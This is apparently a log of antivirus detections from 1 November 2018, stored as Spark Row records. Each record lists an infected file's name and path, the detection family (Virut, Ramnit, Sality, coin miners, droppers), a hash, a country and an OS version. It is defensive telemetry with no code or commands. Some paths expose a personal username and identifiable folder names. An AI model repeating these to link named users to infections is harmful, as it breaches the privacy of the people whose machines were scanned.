  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:08:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:01:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:14:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fsr.exe', filepath='\\?\\J:\\العاب2\\عربيات\\fsr.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='d1703f773e479148b091307bbc99b64b00b1d369d57df151bbbc83915af9621c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:13:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110420-71db3bea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e057c42\\AVSCAN-20181101-105919-4BFF9353\\AVSCAN-20181101-110420-71DB3BEA', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:34:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.vir', filepath='C:\\Windows\\Temp\\nslB3C2.tmp\\xTPKGtGMbiQ.VIR', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESET\\ESET Security\\ekrn.exe', parentsize=2302152, timestamp='2018-11-01T12:05:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='özel dosyalar.exe', filepath='G:\\Özel Dosyalar.exe', filesize=2496000, name='TR/Dropper.Gen.#M300.#R616'), hash='afa0bb04a5f6fd8a1f696508e646b4ff3f97d655537358d74484afcad341106d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:39:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142936-f8d03e25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142936-F8D03E25', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205902-7736473a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c35755c0\\AVSCAN-20181101-205751-6D3D76CC\\AVSCAN-20181101-205902-7736473A', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='cd2a73795bcd963999c929a1ad3f17695eb7e5773effdc96473fca2dc8cc20de', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mapdrive.exe', filepath='K:\\HBCD\\Programs\\MapDrive.exe', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='samdrivers.exe', filepath='D:\\Samdrivers\\Samdrivers.exe', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='silence_finder_setting_parameters.html', filepath='\\\\?\\C:\\Program Files\\Audacity\\help\\manual\\man\\silence_finder_setting_parameters.html', filesize=172000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='56a5b9cbaf651264d4469bb5e8c9d585339aa9439cfbb3bca0c2209d6a59dbbd', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:51:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sachesi.exe', filepath='f:\\bb os 10\\sachesi\\Sachesi.exe', filesize=21568000, name='TR/Patched.Gen.#M300.#R2947'), hash='b58078226a4e756cc770cac6143c39d9703f559ba993cfbb8a0b29b7901b67a2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:22:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110356-c56a8f29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110356-C56A8F29', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae6c89ba33fb3fb7c0ecffcde0ffdc3501b4fe3d405f1d1fef94c6c9b4aa7627', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T11:16:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b09f6f75d2a09b3de4eb006b1bf8ff31301e66f992248583828cf045be12a9bf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\B09F6F75D2A09B3DE4EB006B1BF8FF31301E66F992248583828CF045BE12A9BF', filesize=2048000, name='TR/ATRAPS.Gen2.#M300.#R100632'), hash='b09f6f75d2a09b3de4eb006b1bf8ff31301e66f992248583828cf045be12a9bf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='da05b76288dc3a97f8775f3e5e6a4872cd41c17e9be281c16a9c8ddc9a137dba', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-18\\DA05B76288DC3A97F8775F3E5E6A4872CD41C17E9BE281C16A9C8DDC9A137DBA', filesize=512000, name='TR/AD.Qbot.zeryh.#M1.#R1'), hash='da05b76288dc3a97f8775f3e5e6a4872cd41c17e9be281c16a9c8ddc9a137dba', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:22:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='99c9493fe6e90f651a162ec76e7ecf597e67e69149267724432c7de9a60595a3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T15:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081733-a00de257', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15830c6\\AVSCAN-20181101-081149-80057893\\AVSCAN-20181101-081733-A00DE257', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='6aebd1d925b21a9928f8c876c1b660c171ffac9f1875be9e26d8c786cbe688dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:17:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163215-ad74c2a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17c53a39\\AVSCAN-20181101-163139-A6E8024E\\AVSCAN-20181101-163215-AD74C2A0', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_c2bcaee2.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_c2bcaee2.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='d9186a5819ffad47f82a6e1720812a0589ad39f9fda4f4c32e690f1205f8e2e3', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:35:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='\\\\?\\C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:59:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='copy of spideypc.exe', filepath='\\\\?\\H:\\العاب\\اسبيدر مان\\Copy of SpideyPC.exe', filesize=1536000, name='TR/Patched.Gen.#M300.#R3367'), hash='47c0d47da7fe5d9a115f73e70a63017a03aa579422fc00bf816b10a03655a44f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164404-a5cd066f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-164404-A5CD066F', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:44:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='movingcircle.exe', filepath='C:\\Users\\X\\Documents\\University\\Lab 3 Solution\\Lab 3 Solution\\MovingCircle\\Debug\\MovingCircle.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='6f9ed129dec26d3e6f56011f04baa2133e1a2b8bf6adcaac5361a25424c33a73', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\Common7\\IDE\\devenv.exe', parentsize=723264, timestamp='2018-11-01T22:03:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:38:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T05:18:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005237-0bc63009', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28e34e72\\AVSCAN-20181101-234504-1DD013D9\\AVSCAN-20181102-005237-0BC63009', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:55:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002423-44cf9405', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002423-44CF9405', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003211-779a03d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003211-779A03D7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='waxb503.tmp', filepath='\\\\?\\C:\\Windows\\Temp\\WAXB503.tmp', filesize=10240000, name='HEUR/APC.#M1.#R1'), hash='8389ebae6bdb034985c62aa9abb657916ff4666d322a319f1417cb027547ace5', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:07:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='557d360c30054743f07bc7a6f0c3266048bbfdcdd8f27f208c751ec84fc7d0d6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\557D360C30054743F07BC7A6F0C3266048BBFDCDD8F27F208C751EC84FC7D0D6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='557d360c30054743f07bc7a6f0c3266048bbfdcdd8f27f208c751ec84fc7d0d6', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách đối tượng.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\DANH SÁCH ĐỐI TƯỢNG.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='17a47a4fed25a13302f4391b35f928a044058cb35562ff1487f269af32f3a1a3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:29:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:35:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002657-5589debb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002657-5589DEBB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:27:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flash_update_xp.exe', filepath='C:\\Documents and Settings\\X\\Belgelerim\\Downloads\\flash_update_xp.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='451b5607826f78a0e6e4dc76b412bfa8ea1e2b80c68f0317bad7e691c664ca8c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:46:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:31:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0356826.exe', filepath='\\\\?\\C:\\System Volume Information\\_restore{93F7CC16-D4B7-42F9-9F19-AAFEFA01B068}\\RP1562\\A0356826.exe', filesize=908000, name='ADWARE/BrowseFox.Gen.#M300.#R6112'), hash='2afe98bf12182016b4a6dc0bcfee0c077b376acaa0176b6ce02e9253d58563db', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:57:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095715-5117a4cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ecea4e42\\AVSCAN-20181101-095642-4BDF74A0\\AVSCAN-20181101-095715-5117A4CF', filesize=200000, name='TR/Dropper.Gen.#M1.#R1'), hash='65ac6eda8e1906ec673bcc141ef4f272af6b1c00fbb5bc8c5b9ca58168dbb93e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-204405-b0b4f40f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_72a51702\\AVSCAN-20181101-204243-A28B5228\\AVSCAN-20181101-204405-B0B4F40F', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='4d5550b6882d918bde0c398d782e222dc87f01cadb9c8bc57fbd54b46074b7cb', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:44:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='patch.exe', filepath='c:\\users\\X\\desktop\\patch.exe', filesize=64000, name='SPR/Tool.Patcher.47.#M1.#R1'), hash='80725340b7830288dfe4969eb070a542516a040efc2c1e6473b6051d086f46ab', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T21:51:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cccleaner.exe', filepath='C:\\Program Files\\Siemens\\Automation\\SCADA-RT_V11\\WinCC\\bin\\CCCleaner.exe', filesize=136000, name='W32/Sality.AG.#M1.#R1'), hash='9fc034cc56460461b8033553d27f057ee8e80bb62a912d02ec5e86dbae25d940', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:39:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212201-de40cf5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212201-DE40CF5B', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\xparil0xroo\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:20:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234807-aa433497', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-234807-AA433497', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:45:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='beforeghost.exe', filepath='K:\\HBCD\\Programs\\BEFOREGHOST.EXE', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=3933184, timestamp='2018-11-01T17:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfi riqualifica 582581.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\PFI RIQUALIFICA 582581.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093429-8c241e7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093429-8C241E7E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spinstall.exe', filepath='e:\\all toll\\dragon_v3.53\\drivers\\mtk usb driver\\driver_auto_installer\\smartphonedriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AT.#M1.#R1'), hash='baeae33ce097663d89a9f865cf2695111b6501477b98d438c9c8f5e8ed4dfaa6', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:26:42Z'), dt=datetime.date(2018, 11, 1)),
